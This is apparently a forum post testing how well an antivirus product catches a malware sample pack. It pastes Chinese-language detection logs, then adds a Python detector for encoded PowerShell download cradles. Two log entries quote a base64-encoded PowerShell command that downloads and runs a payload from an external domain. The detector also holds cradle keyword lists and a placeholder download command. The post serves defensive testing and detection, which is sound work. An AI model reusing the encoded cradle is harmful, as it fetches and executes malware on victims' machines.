This post was last edited by aboringman on 2024-7-18 22:50
You probably didn't update the virus database; on my side it catches 5:
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\decoded.ps1, 病毒名:ADV:TrojanSpy/PS.Stealer!meteor, 病毒ID:355bcd22ea5ec33a, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe, 病毒名:ADV:VirTool/MSIL.Obfuscator!meteor, 病毒ID:9b3fa4092c57ea79, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe, 病毒名:ADV:VirTool/MSIL.Obfuscator!meteor, 病毒ID:9b3fa4092c57ea79, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\SapphireX.exe, 病毒名:ADV:VirTool/Obfuscator!meteor, 病毒ID:b6b4d4a297409986, 处理结果:已处理,删除文件
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\Built.exe, 病毒名:TrojanSpy/Python.Stealer.d, 病毒ID:d06410f9a3897eb1, 处理结果:已处理,删除文件
With that turned off it only catches 1......
- 风险路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\Built.exe, 病毒名:TrojanSpy/Python.Stealer.d, 病毒ID:d06410f9a3897eb1, 处理结果:已处理,删除文件
Double-click (execution) part:
Adobe.msi: fail, it ran completely unimpeded and even seemed to update its version (looks like Huorong let its guard down on overseas backdoor/RATs, not even a flash of an alert)
EXECUTE_.exe: the main body was killed, 1 derivative detected
- 病毒名称:Trojan/Injector.RA
- 病毒路径:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe
- 操作结果:已处理
- 进程ID:10236
- 操作进程命令行:"C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\EXECUTE_.exe"
- 父进程ID:5408
- 父进程:C:\Windows\explorer.exe
- 父进程命令行:C:\Windows\Explorer.EXE
j2RUN.exe: 1 derivative detected (this one should share an origin with EXECUTE_.exe, but it did not trigger memory protection)
- 病毒名称:TrojanSpy/Stealer.lf
- 病毒ID:31CF10BB4786F717
- 病毒路径:C:\Users\Killer\AppData\Roaming\d3d9.dll
- 操作类型:修改
- 操作结果:已处理,删除文件
- 进程ID:828
- 操作进程:C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe
- 操作进程命令行:"C:\Users\Killer\Desktop\9x (2024-07-18)\9x (2024-07-18)\1\j2RUN.exe"
- 父进程ID:5408
- 父进程:C:\Windows\explorer.exe
listafamilia_caipira.doc: let through
- 病毒名称:Trojan/MSIL.Injector.fx
- 病毒ID:87EB3A7B00E30394
- 虚拟地址:0x0000000000400000
- 映像大小:184KB
- 是否完整映像:否
- 数据流哈希:cbf6bc92
- 操作结果:已处理
- 进程ID:8512
- 操作进程:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
- 操作进程命令行:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- 父进程ID:9884
- 父进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 父进程命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AaABtAGgAZQBhAGwAdABoAHMAZQByAHYAaQBjAGUAcwAuAGkAbgAvAGEAZABtAGkAbgAvAGoAcwAvAHMAcQBqAHgASAB0AFoAUQBpADgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
- 病毒名称:Trojan/MSIL.Injector.fx
- 病毒ID:87EB3A7B00E30394
- 虚拟地址:0x0000000000400000
- 映像大小:184KB
- 是否完整映像:否
- 数据流哈希:751819cb
- 操作结果:已处理
- 进程ID:5512
- 操作进程:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
- 操作进程命令行:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
- 父进程ID:2480
- 父进程:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
- 父进程命令行:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AaABtAGgAZQBhAGwAdABoAHMAZQByAHYAaQBjAGUAcwAuAGkAbgAvAGEAZABtAGkAbgAvAGoAcwAvAHMAcQBqAHgASAB0AFoAUQBpADgALgBqAHAAZwAnACkAOwBvAGEAdwBuAGQAdQBhAHcAZABuAG4AaABuADkAMgA4ADMAaAAxADkAMgAxAG4AYQB3AG8AZABhAG4AZgBpAGEAdwBiAGQAbgBpAHUAZgBiAG4AYQBpAGQAdwB1AGEAaQBmAHUAYQBiAGkAdQBmAGIAYQBpAHUAZABiAGgAagBhAHcAZABiAGEAZgBoAGoA""
decoded.ps1: not blocked
SapphireX.exe:
Software1.30.1.exe: (same origin as SapphireX.exe)
Vanban_8647_cuong_che_thi_hanh_quyet_dinh.pdf.lnk: C2 already dead (?)
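The RegSvcs.exe records above show the chain worth alerting on: powershell.exe launched with an -e (EncodedCommand) blob, spawning a .NET utility that then carries a non-complete injected image. As an added example that is not part of this post, the Python below decodes such a command line (base64 over UTF-16LE), looks for download-cradle markers in the decoded text and flags the powershell.exe to RegSvcs.exe parent/child pairing. The sample command line, its script text and the example.invalid host are constructed for the test, not taken from the log.

```python
import base64
import re
from typing import Optional

# Markers of a PowerShell download cradle / in-memory loader (matched case-insensitively).
CRADLE_MARKERS = ("net.webclient", "downloadstring", "downloadfile", "iex",
                  "invoke-expression", "invoke-webrequest", "frombase64string")
# .NET utilities commonly used as hosts for injected images; RegSvcs.exe is the one in the log.
INJECTION_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe", "msbuild.exe"}


def split_cmdline(cmdline: str) -> list:
    """Split a Windows command line into tokens, dropping surrounding double quotes."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def is_encoded_switch(token: str) -> bool:
    """PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...)."""
    body = token.lstrip("-/").lower()
    return token[:1] in "-/" and len(body) > 0 and "encodedcommand".startswith(body)


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand carries base64 of the UTF-16LE script text; None if it is not that."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_powershell_cmdline(cmdline: str) -> dict:
    """Decode an encoded command line and classify it by the cradle markers it contains."""
    tokens = split_cmdline(cmdline)
    decoded = None
    for i, tok in enumerate(tokens[:-1]):
        if is_encoded_switch(tok):
            decoded = decode_encoded_command(tokens[i + 1])
            break
    text = (decoded or "").lower()
    hits = [m for m in CRADLE_MARKERS if re.search(r"\b" + re.escape(m) + r"\b", text)]
    verdict = "download_cradle" if hits else ("encoded_only" if decoded else "clean")
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


def assess_process_event(parent_image: str, parent_cmdline: str, child_image: str) -> bool:
    """True when powershell.exe with an encoded cradle launches a known injection host."""
    parent = parent_image.rsplit("\\", 1)[-1].lower()
    child = child_image.rsplit("\\", 1)[-1].lower()
    if parent != "powershell.exe" or child not in INJECTION_HOSTS:
        return False
    return analyze_powershell_cmdline(parent_cmdline)["verdict"] == "download_cradle"


# Constructed sample with the same shape as the logged command line, pointing at a placeholder host.
SAMPLE_SCRIPT = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x.jpg')"
SAMPLE_CMDLINE = ('"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -e '
                  + base64.b64encode(SAMPLE_SCRIPT.encode("utf-16le")).decode("ascii"))
```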